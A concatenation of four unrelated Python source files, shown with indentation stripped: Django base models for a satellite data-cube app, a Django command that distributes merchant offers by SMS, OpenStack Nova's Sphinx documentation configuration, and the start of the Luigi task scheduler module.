raise NotImplementedError("You must define 'get_reverse_time' in the inheriting class.")
def get_processing_method(self):
"""Map a keyword to a function used for data processing.
Maps some number of keywords that exist on the obj to methods in dc_utilities.
For custom mosaics, we use compsoitor id to distinguish the type of mosaic.
"""
"""processing_methods = {
'most_recent': create_mosaic,
'least_recent': create_mosaic,
'max_ndvi': create_max_ndvi_mosaic,
'min_ndvi': create_min_ndvi_mosaic,
'median_pixel': create_median_mosaic
}
return processing_methods.get(self.compositor.id, create_mosaic)
"""
raise NotImplementedError("You must define 'get_processing_method' in the inheriting class.")
@classmethod
def get_queryset_from_history(cls, user_history, **kwargs):
"""Get a QuerySet of Query objects using the a user history queryset
User history is defined in this class and must contain task_id and should be filtered already.
The list of task ids are generated and used in a filter function on Query. Kwargs are passed directly
in to the query filter function as kwargs.
Args:
user_history: Pre filtered UserHistory queryset - must contain attr task_id
**kwargs: Any valid queryset key word arguments - common uses include complete=False, etc.
Returns:
Queryset of queries that fit the criteria and belong to the user.
"""
queryset_pks = [user_history_entry.task_id for user_history_entry in user_history]
return cls.objects.filter(pk__in=queryset_pks, **kwargs)
@classmethod
def get_or_create_query_from_post(cls, form_data, pixel_drill=False):
"""Get or create a query obj from post form data
Using a python dict formatted with post_data_to_dict, form a set of query parameters.
Any formatting of parameters should be done here - including strings to datetime.datetime,
list to strings, etc. The dict is then filtered for 'valid fields' by comparing it to
a list of fields on this model. The query is saved in a try catch - if there is a validation error
then the query exists and should be grabbed with 'get'.
Args:
form_data: python dict containing either a single obj or a list formatted with post_data_to_dict
Returns:
Tuple containing the query model and a boolean value signifying if it was created or loaded.
"""
"""
def get_or_create_query_from_post(cls, form_data, pixel_drill=False):
query_data = form_data
query_data['title'] = "Base Query" if 'title' not in form_data or form_data['title'] == '' else form_data[
'title']
query_data['description'] = "None" if 'description' not in form_data or form_data[
'description'] == '' else form_data['description']
valid_query_fields = [field.name for field in cls._meta.get_fields()]
query_data = {key: query_data[key] for key in valid_query_fields if key in query_data}
query = cls(pixel_drill_task=pixel_drill, **query_data)
try:
query = cls.objects.get(pixel_drill_task=pixel_drill, **query_data)
return query, False
except cls.DoesNotExist:
query = cls(pixel_drill_task=pixel_drill, **query_data)
query.save()
return query, True
"""
raise NotImplementedError(
"You must define the classmethod 'get_or_create_query_from_post' in the inheriting class.")
class Metadata(models.Model):
"""Base Metadata model meant to be inherited by a TaskClass
Serves as the base of all algorithm metadata, containing basic fields such as scene
count, pixel count, clean pixel statistics. Comma seperated fields are also used here
and zipped/fetched using the get_field_as_list function.
Constraints:
All fields excluding primary key are unique together.
all fields are optional and will be replaced with valid values when they
are generated by the task.
Usage:
In each app, subclass Metadata and add all fields (if desired).
Subclass Meta as well to ensure the class remains abstract e.g.
class AppMetadata(Metadata):
sample_field = models.CharField(max_length=100)
class Meta(Metadata.Meta):
pass
"""
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=True)
#meta attributes
pixel_count = models.IntegerField(default=0)
clean_pixel_count = models.IntegerField(default=0)
percentage_clean_pixels = models.FloatField(default=0)
# comma seperated dates representing individual acquisitions
# followed by comma seperated numbers representing pixels per scene.
acquisition_list = models.CharField(max_length=100000, default="")
clean_pixels_per_acquisition = models.CharField(max_length=100000, default="")
clean_pixel_percentages_per_acquisition = models.CharField(max_length=100000, default="")
zipped_metadata_fields = None
class Meta:
abstract = True
def metadata_from_dataset(self, metadata, dataset, clear_mask, parameters):
"""Generate a metadata dictionary from a dataset and a clear mask.
Converts a dataset and a clear mask into the required metadata dict
keyed by a datetime
Args:
metadata: existing metadata dict keyed by time
dataset: xarray dataset
clear_mask: boolean mask
Returns:
metadata dict keyed by datetime
"""
"""
for metadata_index, time in enumerate(dataset.time.values.astype('M8[ms]').tolist()):
clean_pixels = np.sum(clear_mask[metadata_index, :, :] == True)
if time not in metadata:
metadata[time] = {}
metadata[time]['clean_pixels'] = 0
metadata[time]['satellite'] = parameters['platforms'][np.unique(
dataset.satellite.isel(time=metadata_index).values)[0]] if np.unique(
dataset.satellite.isel(time=metadata_index).values)[0] > -1 else "NODATA"
metadata[time]['clean_pixels'] += clean_pixels
return metadata
"""
raise NotImplementedError("You must define 'metadata_from_dataset' in the inheriting class.")
def combine_metadata(self, old, new):
"""Combine metadata dicts generated by metadata_from_dataset"""
"""
for key in new:
if key in old:
old[key]['clean_pixels'] += new[key]['clean_pixels']
continue
old[key] = new[key]
return old
"""
raise NotImplementedError("You must define 'metadata_from_dataset' in the inheriting class.")
def final_metadata_from_dataset(self, dataset):
"""Generate any metadata that can be found in the final dataset"""
"""
self.pixel_count = len(dataset.latitude) * len(dataset.longitude)
self.clean_pixel_count = np.sum(dataset[list(dataset.data_vars)[0]].values != -9999)
self.percentage_clean_pixels = (self.clean_pixel_count / self.pixel_count) * 100
self.save()
"""
raise NotImplementedError("You must define 'final_metadata_from_dataset' in the inheriting class.")
def metadata_from_dict(self, metadata_dict):
"""Initialize all model values from a metadata dict generated by metadata_from_dataset"""
"""
dates = list(metadata_dict.keys())
dates.sort(reverse=True)
self.total_scenes = len(dates)
self.scenes_processed = len(dates)
self.acquisition_list = ",".join([date.strftime("%m/%d/%Y") for date in dates])
self.satellite_list = ",".join([metadata_dict[date]['satellite'] for date in dates])
self.clean_pixels_per_acquisition = ",".join([str(metadata_dict[date]['clean_pixels']) for date in dates])
self.clean_pixel_percentages_per_acquisition = ",".join(
[str((metadata_dict[date]['clean_pixels'] * 100) / self.pixel_count) for date in dates])
self.save()
"""
raise NotImplementedError("You must define 'metadata_from_dict' in the inheriting class.")
def _get_field_as_list(self, field_name):
"""Convert comma seperated strings into lists
Certain metadata fields are stored as comma seperated lists of properties.
Use this function to get the string, split on comma, and return the result.
Args:
field_name: field name as a string that should be converted
Returns:
List of attributes
"""
return getattr(self, field_name).rstrip(',').split(',')
def get_zipped_fields_as_list(self):
"""Creates a zipped iterable comprised of all the fields in self.zipped_metadata_fields
Using _get_field_as_list converts the comma seperated fields in fields
and zips them to iterate. Used to display grouped metadata, generally by
acquisition date.
Args:
fields: iterable of comma seperated fields that should be grouped.
Returns:
zipped iterable containing grouped fields generated using _get_field_as_list
"""
if self.zipped_metadata_fields is None:
raise NotImplementedError("You must define zipped_metadata_fields in all classes that extend Metadata.")
fields_as_lists = [self._get_field_as_list(field) for field in self.zipped_metadata_fields]
return zip(*fields_as_lists)
class Result(models.Model):
"""Base Result model meant to be inherited by a TaskClass
Serves as the base of all algorithm resluts, containing a status, number of scenes
processed and total scenes (to generate progress bar), and a result path.
The result path is required and is the path to the result that should be the
*Default* result shown on the UI map. Other results can be added in subclasses.
Constraints:
result_path is required and must lead to an image that serves as the default result
to be displayed to the user.
Usage:
In each app, subclass Result and add all fields (if desired).
Subclass Meta as well to ensure the class remains abstract e.g.
class AppResult(Result):
sample_field = models.CharField(max_length=100)
class Meta(Result.Meta):
pass
"""
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=True)
#either OK or ERROR or WAIT
status = models.CharField(max_length=100, default="")
#used to pass messages to the user.
message = models.CharField(max_length=100, default="")
scenes_processed = models.IntegerField(default=0)
total_scenes = models.IntegerField(default=0)
#default display result.
result_path = models.CharField(max_length=250, default="")
class Meta:
abstract = True
def get_progress(self):
"""Quantify the progress of a result's processing in terms of its own attributes
Meant to return a representation of progress based on attributes set in a task.
Should be overwritten in the task if scenes processed and total scenes aren't
a useful representation
Returns:
An integer between 0 and 100
"""
total_scenes = self.total_scenes if self.total_scenes > 0 else 1
percent_complete = self.scenes_processed / total_scenes
rounded_int = round(percent_complete * 100)
clamped_int = max(0, min(rounded_int, 100))
return clamped_int
class GenericTask(Query, Metadata, Result):
"""Serves as the model for an algorithm task containing a Query, Metadata, and Result
The generic task should be implemented by each application. Each app should subclass
Query, Result, and Metadata, adding all desired fields according to docstrings. The
app should then include a AppTask implementation that ties them all together:
CustomMosaicTask(CustomMosaicQuery, CustomMosaicMetadata, CustomMosaicResult):
pass
This Generic task should not be subclassed and should be used only as a model for how
things should be tied together at the app level.
Constraints:
Should subclass Query, Metadata, and Result (or a subclass of each)
Should be used for all processing and be passed using a uuid pk
Attributes should NOT be added to this class - add them to the inherited classes
"""
class Meta:
abstract = True
class ResultType(models.Model):
"""Stores a result type for an app that relates to options in the celery tasks
Contains a satellite id, result id, and result type for differentiating between different
result types. the result type should be displayed on the UI, passing the id as form data.
The id should be handled directly in the celery task execution. This should be inherited at the
app level without inheriting meta - the resulting class should not be abstract.
Constraints:
None yet.
"""
result_id = models.CharField(max_length=25, unique=True)
name = models.CharField(max_length=25)
class Meta:
abstract = True
def __str__(self):
return self.name
class AnimationType(models.Model):
"""
Stores a single instance of an animation type. Includes human readable, id, variable and band.
These correspond to the datatypes and bands found in tasks.py for the animation enabled apps.
Used to populate UI forms.
Band number and data variable are interpretted at the app level in tasks.py.
"""
animation_id = models.CharField(max_length=25, default="None", unique=True)
name = models.CharField(max_length=25, default="None")
data_variable = models.CharField(max_length=25, default="None")
def __str__(self):
return self.name
class Meta:
abstract = True
class ToolInfo(models.Model):
"""Model used to handle the region selection page information and images.
Stores images and information for the region selection page for each tool. Information includes
the descriptions seen on the page as well as their respective images. For instance, if we want
three images to scroll across the carousel, we would create three ToolInfo instances each with
an image and description.
Attributes:
image_path: path to the banner image that is to be shown on the top of the page
image_title: title describing the image - will be displayed on page.
image_description: description text for the image. Will be displayed on page.
"""
image_path = models.CharField(max_length=100)
image_title = models.CharField(max_length=50)
image_description = models.CharField(max_length=500)
class Meta:
abstract = True
def __str__(self):
return self.image_title
class UserHistory(models.Model):
"""Contains the task history for a given user.
This shoud act as a linking table between a user and their tasks.
When a new task is submitted, a row should be created linking the user
to the task by id.
Constraints:
user_id should map to a user's id.
task_id should map to the pk of a task
"""
user_id = models.IntegerField()
task_id = models.UUIDField()
class Meta:
abstract = True
|
|
from django.core.management.base import NoArgsCommand
from django.utils.translation import ugettext as _
from django.utils.translation import ungettext, string_concat
from django.conf import settings
from googlevoice.util import ValidationError
from shoppleyuser.models import *
from offer.models import *
from shoppleyuser.utils import sms_notify
from offer.utils import TxtTemplates
SMS_DEBUG = settings.SMS_DEBUG
RADIUS = settings.DEFAULT_RADIUS
class Command(NoArgsCommand):
help = 'Distributes the offers strategically.'
DEBUG = False
def notify(self, phone, msg):
if SMS_DEBUG:
print _("\"%(msg)s\" sent to %(phone)s") % {"msg":msg, "phone":phone,}
else:
return sms_notify(phone,msg)
def handle_noargs(self, **options):
"""
read all the offers that have not been distributed, find target users for
each offer and control how many offers individual gets
"""
t = TxtTemplates()
#####################################
# process offer distribute
#####################################
process_areas = Offer.objects.filter(is_processing=True).values('merchant__zipcode').distinct()
black_words = BlackListWord.objects.all().values_list('word', flat=True)
# for each area
for z in process_areas:
# for each offer in current area
for o in Offer.objects.filter(merchant__zipcode=z['merchant__zipcode'], is_processing=True):
"""
# check if merchant has enough credits
"""
print "processing: ", o
from worldbank.models import Transaction
allowed_number =int( o.merchant.balance/abs(Transaction.points_table["MOD"]))
#print "balance=" ,self.merchant.balance
#print "allowed_number", allowed_number
if allowed_number == 0:
# if there isn't enough balance
receipt_msg = t.render(TxtTemplates.templates["MERCHANT"]["OFFER_NOTENOUGH_BALANCE"], {"points":o.merchant.balance})
o.is_processing = False
o.save()
o.delete()
continue
"""
# check if offer has words in the black list
"""
blacked = set(o.title.lower().split()).intersection(black_words)
if len(blacked) == 0:
# if valid content
"""
# select target size
"""
target_size = 20 if allowed_number > 20 else allowed_number
# TODO: need to select 80% of followers and 20% of non-followers
target_list = []
# divide up user base in this area and distribute
users=o.merchant.get_active_customers_miles(RADIUS)
num_users = len(users)
if num_users > target_size:
target_list = random.sample(users, target_size)
elif num_users > 0:
target_list = list(users)
else:
# no target users that have not received offer
# select users again among those previously received but haven't
# filled their quota
users=Customer.objects.filter(verified=True, active=True, zipcode=z['merchant__zipcode']).values_list('pk', flat=True)
num_users = users.count()
if num_users > target_size:
target_list = random.sample(users, target_size)
elif num_users > 0:
target_list = list(users)
print "target", target_list
# distribute offer: generate offer codes
sentto = o.gen_offer_codes(Customer.objects.filter(pk__in=target_list))
print "sentto:" , sentto
#print "count=" , self.offercode_set.all().count()
for c in o.offercode_set.all():
offer_msg = t.render(TxtTemplates.templates["CUSTOMER"]["OFFER_RECEIVED"],{ "merchant":o.merchant.business_name, "title":o.title, "code":c.code })
#print c.customer.customerphone.number, offer_msg
success = self.notify(c.customer.customerphone.number, offer_msg)
if success :
transaction = Transaction.objects.create(time_stamp=datetime.now(),
offer = o,
offercode = c,
dst = o.merchant,
ttype = "MOD")
transaction.execute()
if sentto==0 :
# no customers
receipt_msg = t.render(TxtTemplates.templates["MERCHANT"]["OFFER_NO_CUSTOMER"], {"code":o.gen_tracking_code()})
else:
"""
# successfully sent offers
"""
receipt_msg = t.render(TxtTemplates.templates["MERCHANT"]["OFFER_SUCCESS"], {
"time": pretty_datetime(o.time_stamp),
"offer": o,
"number": sentto,
"code": o.gen_tracking_code(),
})
else:
"""
# black list the offer
"""
bo = BlackListOffer(offer=o)
bo.save()
for b_word in blacked:
bo.words.add(BlackListWord.objects.get(word=b_word))
bo.save()
receipt_msg = t.render(TxtTemplates.templates["MERCHANT"]["OFFER_BLACKLIST"], { "unacceptable": ','.join(blacked)
})
if o.starter_phone:
self.notify(o.starter_phone.number, receipt_msg)
else:
self.notify(o.merchant.phone, receipt_msg)
"""
# Update offer parameters
"""
o.num_init_sentto = sentto
o.expired_time = o.starting_time + timedelta(minutes=o.duration)
o.is_processing = False
o.save()
#####################################
# process offer redistribute
#####################################
process_areas = Offer.objects.filter(redistribute_processing=True).values('merchant__zipcode').distinct()
# for each area
for z in process_areas:
# for each offer in current area
for o in Offer.objects.filter(merchant__zipcode=z['merchant__zipcode'], redistribute_processing=True):
"""
# check if merchant has enough credits
"""
from worldbank.models import Transaction
allowed_number =int( o.merchant.balance/abs(Transaction.points_table["MOD"]))
#print "balance=" ,self.merchant.balance
#print "allowed_number", allowed_number
if allowed_number == 0:
# if there isn't enough balance
receipt_msg = t.render(TxtTemplates.templates["MERCHANT"]["REOFFER_NOTENOUGH_BALANCE"], {"points":o.merchant.balance})
o.redistribute_processing = False
o.save()
continue
# customers who have received the offers
old_offercodes = o.offercode_set.all()
# extend old customers
for oc in old_offercodes:
#print "before reset" , pretty_datetime(oc.expiration_time), " duration=", self.duration
oc.expiration_time = datetime.now() + timedelta(minutes=o.duration)
#print "time added" , datetime.now() + timedelta(minutes=self.duration)
oc.save()
"""
# NOTE: not send confirmation to save txt messages
offer_msg = t.render(TxtTemplates.templates["CUSTOMER"]["REOFFER_EXTENSION"],{
"code": oc.code,
"title": self.title,
"merchant": self.merchant.business_name,
"address": self.merchant.print_address(),
"expiration": pretty_datetime(oc.expiration_time),})
self.notify(oc.customer.phone, offer_msg)
"""
old_pks = old_offercodes.values_list('customer',flat=True)
"""
# select target size
"""
target_size = 20 if allowed_number > 20 else allowed_number
# TODO: need to select 80% of followers and 20% of non-followers
target_list = []
# divide up user base in this area and distribute
users=o.merchant.get_active_customers_miles(RADIUS, old_pks)
num_users = len(users)
if num_users > target_size:
target_list = random.sample(users, target_size)
elif num_users > 0:
target_list = list(users)
else:
# no target users that have not received offer
# select users again among those previously received but haven't
# filled their quota
users=Customer.objects.exclude(pk__in=old_pks).filter(verified=True, active=True, zipcode=z['merchant__zipcode']).values_list('pk', flat=True)
num_users = users.count()
if num_users > target_size:
target_list = random.sample(users, target_size)
elif num_users > 0:
target_list = list(users)
# distribute offer
resentto = o.gen_offer_codes(Customer.objects.filter(pk__in=target_list))
#print "count=" , self.offercode_set.all().count()
for oc in o.offercode_set.filter(customer__pk__in=target_list):
oc.expiration_time = datetime.now() + timedelta(minutes=o.duration)
oc.save()
offer_msg = t.render(TxtTemplates.templates["CUSTOMER"]["REOFFER_NEWCUSTOMER_RECEIVED"],{ "merchant":o.merchant.business_name, "title":o.title, "code":oc.code })
success= self.notify(oc.customer.customerphone.number, offer_msg)
if success :
transaction = Transaction.objects.create(time_stamp=datetime.now(),
offer = o,
offercode = oc,
dst = o.merchant,
ttype = "MOD")
transaction.execute()
if resentto==0 :
# no customers
receipt_msg = t.render(TxtTemplates.templates["MERCHANT"]["REOFFER_ZERO_CUSTOMER"], {"code": o.trackingcode.code})
else:
"""
# successfully sent offers
"""
receipt_msg = t.render(TxtTemplates.templates["MERCHANT"]["REOFFER_SUCCESS"], {
"title" : o.title,
"resentto": resentto,
})
if o.starter_phone:
self.notify(o.starter_phone.number, receipt_msg)
else:
self.notify(o.merchant.phone, receipt_msg)
"""
# Update offer parameters
"""
#print "*************************** SENT RESEND OFFER *************************"
o.num_resent_to = resentto
o.redistribute_processing = False
o.redistributable = False
o.expired_time = datetime.now() + timedelta(minutes=o.duration)
o.save()
####################################
# process iwant requests by trying to send the request to merchants of
# category that matches the request
####################################
# for w in IWantRequest.objects.filter(processed=False):
# category = w.match_category()
# # send out the request to those stores in the category
# for m in Merchant.objects.filter(zipcode=w.customer.zipcode, categories=category):
# msg = t.render(TxtTemplates.templates["MERCHANT"]["CUSTOMER_WANTS"],
# {
# "request": w.request,
# })
# self.notify(m.phone, msg)
|
|
# -*- coding: utf-8 -*-
#
# nova documentation build configuration file, created by
# sphinx-quickstart on Sat May 1 15:17:47 2010.
#
# This file is execfile()d with the current directory set to
# its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../../'))
sys.path.insert(0, os.path.abspath('../'))
sys.path.insert(0, os.path.abspath('./'))
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc',
'ext.nova_todo',
'sphinx.ext.coverage',
'sphinx.ext.pngmath',
'sphinx.ext.ifconfig',
'sphinx.ext.graphviz',
'oslo.sphinx',
]
todo_include_todos = True
# Add any paths that contain templates here, relative to this directory.
# Changing the path so that the Hudson build output contains GA code
# and the source docs do not contain the code so local, offline sphinx builds
# are "clean."
templates_path = []
if os.getenv('HUDSON_PUBLISH_DOCS'):
templates_path = ['_ga', '_templates']
else:
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'nova'
copyright = u'2010-present, OpenStack Foundation'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
from nova.version import version_info
# The full version, including alpha/beta/rc tags.
release = version_info.release_string()
# The short X.Y version.
version = version_info.version_string()
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
unused_docs = [
'api_ext/rst_extension_template',
'vmwareapi_readme',
'installer',
]
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = []
# The reST default role (used for this markup: `text`) to use
# for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = False
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
modindex_common_prefix = ['nova.']
# -- Options for man page output ----------------------------------------------
# Grouping the document tree for man pages.
# List of tuples 'sourcefile', 'target', u'title', u'Authors name', 'manual'
man_pages = [
('man/nova-all', 'nova-all', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-api-ec2', 'nova-api-ec2', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-api-metadata', 'nova-api-metadata', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-api-os-compute', 'nova-api-os-compute',
u'Cloud controller fabric', [u'OpenStack'], 1),
('man/nova-api', 'nova-api', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-cert', 'nova-cert', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-compute', 'nova-compute', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-console', 'nova-console', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-consoleauth', 'nova-consoleauth', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-dhcpbridge', 'nova-dhcpbridge', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-manage', 'nova-manage', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-network', 'nova-network', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-novncproxy', 'nova-novncproxy', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-spicehtml5proxy', 'nova-spicehtml5proxy', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-objectstore', 'nova-objectstore', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-rootwrap', 'nova-rootwrap', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-rpc-zmq-receiver', 'nova-rpc-zmq-receiver', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-scheduler', 'nova-scheduler', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-xvpvncproxy', 'nova-xvpvncproxy', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-conductor', 'nova-conductor', u'Cloud controller fabric',
[u'OpenStack'], 1),
]
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme_path = ["."]
# html_theme = '_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
git_cmd = "git log --pretty=format:'%ad, commit %h' --date=local -n1"
html_last_updated_fmt = os.popen(git_cmd).read()
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'novadoc'
# -- Options for LaTeX output -------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'Nova.tex', u'Nova Documentation',
u'OpenStack Foundation', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'python': ('http://docs.python.org/', None),
'swift': ('http://swift.openstack.org', None)}
|
|
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
The system for scheduling tasks and executing them in order.
Deals with dependencies, priorities, resources, etc.
The :py:class:`~luigi.worker.Worker` pulls tasks from the scheduler (usually over the REST interface) and executes them.
See :doc:`/central_scheduler` for more info.
"""
import collections
try:
import cPickle as pickle
except ImportError:
import pickle
import datetime
import functools
import itertools
import logging
import os
import time
from luigi import six
from luigi import configuration
from luigi import notifications
from luigi import parameter
from luigi import task_history as history
from luigi.task_status import DISABLED, DONE, FAILED, PENDING, RUNNING, SUSPENDED, UNKNOWN
from luigi.task import Config
logger = logging.getLogger("luigi.server")
class Scheduler(object):
"""
Abstract base class.
Note that the methods all take string arguments, not Task objects...
"""""
add_task = NotImplemented
get_work = NotImplemented
ping = NotImplemented
UPSTREAM_RUNNING = 'UPSTREAM_RUNNING'
UPSTREAM_MISSING_INPUT = 'UPSTREAM_MISSING_INPUT'
UPSTREAM_FAILED = 'UPSTREAM_FAILED'
UPSTREAM_DISABLED = 'UPSTREAM_DISABLED'
UPSTREAM_SEVERITY_ORDER = (
'',
UPSTREAM_RUNNING,
UPSTREAM_MISSING_INPUT,
UPSTREAM_FAILED,
UPSTREAM_DISABLED,
)
UPSTREAM_SEVERITY_KEY = UPSTREAM_SEVERITY_ORDER.index
STATUS_TO_UPSTREAM_MAP = {
FAILED: UPSTREAM_FAILED,
RUNNING: UPSTREAM_RUNNING,
PENDING: UPSTREAM_MISSING_INPUT,
DISABLED: UPSTREAM_DISABLED,
}
class scheduler(Config):
# TODO(erikbern): the config_path is needed for backwards compatilibity. We should drop the compatibility
# at some point (in particular this would force users to replace all dashes with underscores in the config)
retry_delay = parameter.FloatParameter(default=900.0)
remove_delay = parameter.FloatParameter(default=600.0)
worker_disconnect_delay = parameter.FloatParameter(default=60.0)
state_path = parameter.Parameter(default='/var/lib/luigi-server/state.pickle')
# Jobs are disabled if we see more than disable_failures failures in disable_window seconds.
# These disables last for disable_persist seconds.
disable_window = parameter.IntParameter(default=3600,
config_path=dict(section='scheduler', name='disable-window-seconds'))
disable_failures = parameter.IntParameter(default=None,
config_path=dict(section='scheduler', name='disable-num-failures'))
disable_hard_timeout = parameter.IntParameter(default=None,
config_path=dict(section='scheduler', name='disable-hard-timeout'))
disable_persist = parameter.IntParameter(default=86400,
config_path=dict(section='scheduler', name='disable-persist-seconds'))
max_shown_tasks = parameter.IntParameter(default=100000)
prune_done_tasks = parameter.BoolParameter(default=False)
record_task_history = parameter.BoolParameter(default=False)
prune_on_get_work = parameter.BoolParameter(default=False)
def fix_time(x):
# Backwards compatibility for a fix in Dec 2014. Prior to the fix, pickled state might store datetime objects
# Let's remove this function soon
if isinstance(x, datetime.datetime):
return time.mktime(x.timetuple())
else:
return x
class Failures(object):
"""
This class tracks the number of failures in a given time window.
Failures added are marked with the current timestamp, and this class counts
the number of failures in a sliding time window ending at the present.
"""
def __init__(self, window):
"""
Initialize with the given window.
:param window: how long to track failures for, as a float (number of seconds).
"""
self.window = window
self.failures = collections.deque()
self.first_failure_time = None
def add_failure(self):
"""
Add a failure event with the current timestamp.
"""
failure_time = time.time()
if not self.first_failure_time:
self.first_failure_time = failure_time
self.failures.append(failure_time)
def num_failures(self):
"""
Return the number of failures in the window.
"""
min_time = time.time() - self.window
while self.failures and fix_time(self.failures[0]) < min_time:
self.failures.popleft()
return len(self.failures)
def clear(self):
"""
Clear the failure queue.
"""
self.failures.clear()
def _get_default(x, default):
if x is not None:
return x
else:
return default
class Task(object):
def __init__(self, task_id, status, deps, resources=None, priority=0, family='', module=None,
params=None, disable_failures=None, disable_window=None, disable_hard_timeout=None):
self.id = task_id
self.stakeholders = set() # workers ids that are somehow related to this task (i.e. don't prune while any of these workers are still active)
self.workers = set() # workers ids that can perform task - task is 'BROKEN' if none of these workers are active
if deps is None:
self.deps = set()
else:
self.deps = set(deps)
self.status = status # PENDING, RUNNING, FAILED or DONE
self.time = time.time() # Timestamp when task was first added
self.retry = None
self.remove = None
self.worker_running = None # the worker id that is currently running the task or None
self.time_running = None # Timestamp when picked up by worker
self.expl = None
self.priority = priority
self.resources = _get_default(resources, {})
self.family = family
self.module = module
self.params = _get_default(params, {})
self.disable_failures = disable_failures
self.disable_hard_timeout = disable_hard_timeout
self.failures = Failures(disable_window)
self.scheduler_disable_time = None
self.runnable = False
def __repr__(self):
return "Task(%r)" % vars(self)
def add_failure(self):
self.failures.add_failure()
def has_excessive_failures(self):
if (self.failures.first_failure_time is not None and
self.disable_hard_timeout):
if (time.time() >= self.failures.first_failure_time +
self.disable_hard_timeout):
return True
if self.failures.num_failures() >= self.disable_failures:
return True
return False
def can_disable(self):
return (self.disable_failures is not None or
self.disable_hard_timeout is not None)
class Worker(object):
"""
Structure for tracking worker activity and keeping their references.
"""
